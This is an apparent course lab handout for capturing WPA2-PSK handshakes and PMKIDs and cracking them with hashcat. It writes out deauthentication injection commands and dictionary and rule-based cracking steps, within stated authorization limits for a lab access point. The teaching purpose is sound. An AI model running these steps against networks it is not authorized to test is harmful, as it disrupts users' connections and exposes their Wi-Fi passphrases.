Classroom Glossary Public page

WIR-101 Lab 4 — WPA2-PSK: Handshake Capture and Dictionary Attack

677 words

Prerequisites: Week 4 lecture; hcxdumptool + hashcat installed; GPU acceleration verified with hashcat -I Duration: ~90 min Points: 100

Authorization

  • Lab Authorization Form signed
  • Capture targets: VCA-WIR101-LAB (WPA2-PSK) only
  • Deauthentication is authorized against the lab AP's connected clients only
  • No production APs visible in your survey may be targeted

Objective

Capture a WPA2-PSK 4-way handshake using deauthentication injection, attempt a PMKID capture, and run a dictionary attack with hashcat. Understand the key derivation chain from passphrase to MIC.

Part A — Pre-Capture Survey (10 min)

sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

Identify VCA-WIR101-LAB and any connected client stations (STA column in airodump-ng output). Record:

  • AP BSSID: ___
  • AP SSID: VCA-WIR101-LAB
  • Channel: ___
  • A connected client MAC (at least one should be visible in the STATION section): ___

Lock to the channel:

sudo airodump-ng -c CHANNEL --bssid AP_BSSID -w wpa2_capture --output-format pcap wlan0mon

Deliverable A

Screenshot of airodump-ng showing the AP and at least one connected client.

Part B — PMKID Capture (20 min)

PMKID capture does not require a connected client. It requests an association from the AP and extracts the PMKID from Message 1 of the EAPOL exchange.

sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --enable_status=1

Wait 2-3 minutes. The --enable_status=1 flag prints a one-line status every second; look for lines showing PMKID captures. Press Ctrl+C when you have at least one PMKID.

Extract to hashcat format:

hcxpcapngtool -o hash_pmkid.22000 pmkid_capture.pcapng

Check the output:

wc -l hash_pmkid.22000
cat hash_pmkid.22000 | head -2

The format is: hash_type*PMKID*AP_MAC*STA_MAC*ESSID_hex

Deliverable B

Screenshot of hcxdumptool output showing at least one PMKID captured + the first line of hash_pmkid.22000.

Part C — 4-Way Handshake Capture via Deauthentication (20 min)

While airodump-ng is still running in one terminal, send a targeted deauthentication to force the client to re-authenticate:

sudo aireplay-ng -0 1 -a AP_BSSID -c CLIENT_MAC wlan0mon

Watch the airodump-ng output for the WPA handshake: AP_BSSID message in the top-right corner. This confirms a 4-way handshake was captured.

If no handshake appears within 30 seconds, send another deauth (-0 1 = 1 deauth frame). If it still doesn't appear after 3 attempts, check that the client is actually connected and in range.

Extract the handshake:

hcxpcapngtool -o hash_eapol.22000 wpa2_capture-01.cap
wc -l hash_eapol.22000

You can also verify in Wireshark:

filter: eapol

You should see 4 EAPOL frames in sequence (Message 1, 2, 3, 4).

Deliverable C

Screenshot of airodump-ng showing WPA handshake: BSSID message + Wireshark screenshot showing the 4 EAPOL frames.

Part D — Dictionary Attack with hashcat (25 min)

The lab AP is pre-configured with a passphrase that exists in the provided wordlist lab4_wordlist.txt (10,000 entries, downloadable from the course portal).

Attack the PMKID hash first (faster verification if it finds a match):

hashcat -m 22000 hash_pmkid.22000 lab4_wordlist.txt

If PMKID attack succeeds, record the passphrase. Then verify the EAPOL handshake hash recovers the same passphrase:

hashcat -m 22000 hash_eapol.22000 lab4_wordlist.txt

If PMKID failed (e.g., AP did not include PMKID in EAPOL Message 1), fall back to EAPOL only.

Run a second attack with rules (demonstrates how rule-based mutations extend wordlists):

hashcat -m 22000 hash_eapol.22000 lab4_wordlist.txt -r /usr/share/hashcat/rules/best64.rule

Record for each attempt: hash type, wordlist, rule file (if any), result (cracked/not found), time taken.

Deliverable D

hashcat output showing the cracked passphrase for both PMKID and EAPOL hashes + a summary table (hash type, wordlist, result, time).

Part E — PMK Derivation Verification (10 min)

Verify your understanding of the key derivation using Python:

import hashlib, binascii

passphrase = b"CRACKED_PASSPHRASE_HERE"  # fill in what you found
ssid = b"VCA-WIR101-LAB"

pmk = hashlib.pbkdf2_hmac('sha1', passphrase, ssid, 4096, 32)
print("PMK:", binascii.hexlify(pmk).decode())

Compare your PMK to what hashcat reports in the --show output (if it includes the PMK in verbose mode: hashcat -m 22000 --show hash_eapol.22000).

Deliverable E

The Python PMK output.

Write-up Questions

  1. What is the functional difference between the PMKID attack and the 4-way handshake attack? Which is more dangerous to network defenders, and why?
  2. The lab wordlist has 10,000 entries. At your GPU speed (from hashcat -I), how long would it take to exhaust rockyou.txt (~14 million entries) against a single WPA2-PSK hash?
  3. The lab AP SSID is "VCA-WIR101-LAB." If you computed a rainbow table for SSID "home-network," would those precomputed PMKs work against this AP? Why or why not?
  4. A user changes their WPA2-PSK passphrase from "password123" to a 25-character random string. What specific aspect of PBKDF2 makes GPU attacks against the new passphrase impractical (even if the hash is captured)?

Cleanup

sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

Virtual Path

The virtual path provides:

  • hash_pmkid_lab4.22000: a pre-extracted PMKID hash from the lab AP
  • hash_eapol_lab4.22000: a pre-extracted EAPOL handshake hash
  • lab4_wordlist.txt: the wordlist

Complete Parts D and E only. For Part B/C, study the provided Wireshark screenshot of the EAPOL sequence and answer write-up questions based on the provided data.

Submission

Zip into lab4_YOURNAME.zip:

  • deliverable_A.png through deliverable_E.txt
  • pmk_verify.py
  • writeup.md